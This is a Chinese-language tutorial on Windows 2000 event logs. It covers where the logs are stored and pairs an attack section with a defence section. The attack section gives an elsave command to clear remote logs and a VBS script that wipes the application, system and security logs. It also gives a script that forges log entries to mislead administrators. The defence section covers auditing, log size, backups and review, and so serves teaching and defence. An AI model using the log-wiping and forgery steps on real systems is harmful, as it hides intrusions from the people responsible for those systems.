说日志

suncon

说日志

写日记的读者一定深有体会，平时把事情记下来，到查看的时候就很方便。计算机也是如此，把一些关键性的用户行为加以记载备案，可以极大地方便系统管理员对系统情况进行掌握。尤其对一个网络管理员来讲，当系统的一举一动都在你掌握之中时，又会怕什么呢？反之，对于别有用心的黑客或攻击者，日志的正常运行无异于一个噩梦。如同江洋大盗希望“踏雪无痕”一样，攻击者的梦想就是让日志不再开口说话。总之，无论正邪高手，对日志问题都是空间重视的。下面的内容，都已在Windows 2000 Server及其以上系统中测试通过！

认识Windows日志

闲话少说，先来看看Windows系统的日志对一个网管的重要性：它记录着系统各项服务的各个细节（包括启动、运行、关闭、错误等各种信息）以及对本地系统的访问情况，从日志中一个有经验的网管可以很轻松地找出不属于“该发生”的事情，并根据线索追查到攻击者。

为了达到这样的目的，Windows系统对日志服务做了很严格而全面的分类，即分为应用程序日志、安全日志、系统日志、DNS服务器日志、FTP服务器日志和IIS服务器日志等。同时，为了保护日志的有效安全，在一般情况下，日志文件是处于严密保护之下的，普通用户不能随意更改，不能用普通编辑器编辑，甚至不能对它进行重命名、删除等操作，否则系统提示“访问被拒绝”！例如，启动Windows 2000时，事件日志服务会自动启动，所有用户都可以查看“应用程序日志”，但是只有系统管理员才能访问“安全日志”和“系统日志”。

小提示：Windows 2000默认情况下会关闭“安全日志”，那需要在“开始”→“运行”中输入“gpedit.msc”启动“组策略”，然后来启用安全日志（具体开启方法见下文）。一旦开启，它就会持续记录，直到达到设定的日志文件大小为止。

☆

suncon

在Windows 2000系统中，系统的各种日志文件存放位置如下：

应用程序日志、安全日志、系统日志、DNS日志默认位置都在%systemroot%\sys tem32\config，默认文件大小512KB，但这大小无法持续长时间进行记录，有经验的管理员一般都会修改的。而IIS服务FTP日志默认位置是在%systemroot%\system32\logfiles\msftpsvc1，IIS服务WWW日志默认位置则位于%systemroot%\system32\logfiles\w3svc1。
具体的文件名则是：
安全日志文件：%systemroot%\system32\config\SecEvent.EVT。
系统日志文件：%systemroot%\system32\config\SysEvent.EVT。
应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT。
Scheduler服务器日志文件是%systemroot%\schedlgu.txt（该日志记录了访问者的IP，访问的时间及请求访问的内容）。

小提示：我们只要选控制面板→管理工具→时间查看器，就可以观察应用程序日志、安全日志、系统日志、DNS服务器日志。服务器日志请在相应的服务器配置程序中查看。






图1


要让系统能主动管理日志文件，必须要在注册表中注册，所以这些文件还在注册表的HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog处做了登记。同时，Windows 2000中提供了一个叫做安全日志分析器(CyberSafe Log Analyst，CLA)的工具，通过分类的方式将各种事件整理好，让管理员能迅速找到所需要的条目。

suncon

日志攻防战（以下操作在Windows2000 Advanced Server中通过）

1.攻——让日志死去吧

要让日志死掉不说话是很难的，因为日志是由系统来管理、保护的，一般情况下是禁止删除或修改。此外，它还与注册表密切相关，所以在Windows 2000中删除日志首先要取得系统管理员权限，因为安全日志和系统日志必须由系统管理员方可查看，然后才可以删除它们（或者停掉这些服务），而安全日志的删除就更为麻烦。

这里可以借助一个第三方软件来实现，那就是小榕的elsave：在获得系统管理员权限后，与对方建立IPC管理会话，输入net use \\对方IP pass /user: user，然后输入elsave -s \\对方IP -l application -C，这样就删除了安全日志。

当然，达人级的攻击者还会利用VBS脚本来达到目的，代码如下：
cleanevent.vbs
strComputer = "."
Set objWMIService = GetObject（"winmgmts:" _
& "{impersonationLevel=impersonate,（Backup）}!\\" & _
strComputer & "\root\cimv2"）
dim mylogs（3）
mylogs（1）="application"
mylogs（2）="system"
mylogs（3）="security"
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
（"Select * from Win32_NTEventLogFile where LogFileName=’"&logs&"’"）
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog（）
Next
next

然后他要做的是重新建立假的日志（要是日志突然什么都没有了，再笨的管理员也知道发生什么了），一样使用VBS脚本：
createlog.vbs
set ws=wscript.createobject("Wscript.shell")
ws.logevent 0 ,"write log success"

关键在于“logevent”后的数字参数。0代表成功执行，1代表执行出错 ，2代表警告 ，4代表信息 ，8代表成功审计，16代表故障审计。所以上面代码中，把0改为1、2、4、8和16均可，引号下的为日志描述，想怎么写都成，当然用点心骗网管是最好的。

这种方法有点麻烦，但不知道为什么，比尔.盖茨在XP系统中了为了方便广大黑客哥们，居然提供了一个更方便的工具eventcreate.exe，晕~

suncon

2.防——你以为我不知道？

Win2000自带了相当强大的安全日志系统，从用户登录到特权的使用都有非常详细的记录，可惜的是，默认安装下安全审核是关闭的。我们要做的第一步是进入系统的“管理工具”，在“本地安全策略”中打开“本地策略/审核策略”(或选“开始”菜单，选“运行”，输入gpedit.msc开启组策略，选“本地计算机策略”→“计算机配置”→“Windows设置”→“安全设置”→“本地策略”→“审核策略”），在要打开的策略上点击鼠标右键，选择“安全性”，之后复选“成功”和“失败”，即可开启需要的审核(图2)。






图2


然后要做的就是更好的利用和保护日志文件。首先更改日志文件的默认大小，在注册表中HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog对应的每个日志的maxsize子键处修改日志文件默认大小（图3），防止达到文件尺寸上限停止记录（也可在事件查看器中进行设置，如图4）。





图3






图4


当然也可以利用脚本技术来实现，这里不再多讲，有兴趣的朋友可以自己尝试一下。

suncon

接着就是日志的查询和备份了。如果没有经常性的备份，日志一旦被入侵者删除更改的话，会相当被动。这里推荐使用微软出的dumpel.exe工具，例如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式：
dumpel \\server -l system -f backupsystem.log

再利用计划任务可以实现定期备份系统日志。

制定一个安全日志的检查机制也是非常重要的。推荐的检查时间是每天上午，这是因为，入侵者喜欢夜间行动（月黑风高黑人夜呀）。当然，要想迅速从繁多的日志文件记录中查找到入侵信息，就要使用一些专业的日志管理工具。例如Surfstats Log Analyzer等。

如此下来，江湖上的风浪，不知道是更大，还是更平静了呢？

编后语：不推荐使用脚本编写程序用电子邮件发送安全日志，因为入侵者一样可以修改该脚本发送伪造的日志，让在远程的你满以为天下太平。当然，要想迅速从繁多的日志文件记录中查找到入侵信息，那就要使用一些专业的日志管理工具，如Surfstats Log Analyzer，此乃后话，还是下次给大家写吧。

----------------------------------------------------

相关工具下载：
ResourceKit下载，文中多个工具在这个包里
http://www.cnyhw.com/news/newsxt/yhwnews/list.asp?id=387
Surfstats Log Analyzer 下载
http://www.ttdown.com/SoftView/SoftView_8312.html
EventCreate工具
xp下系统自带的……
elsave 下载：
http://bhole.pc37.org/Download/Log/030504-Elsave.htm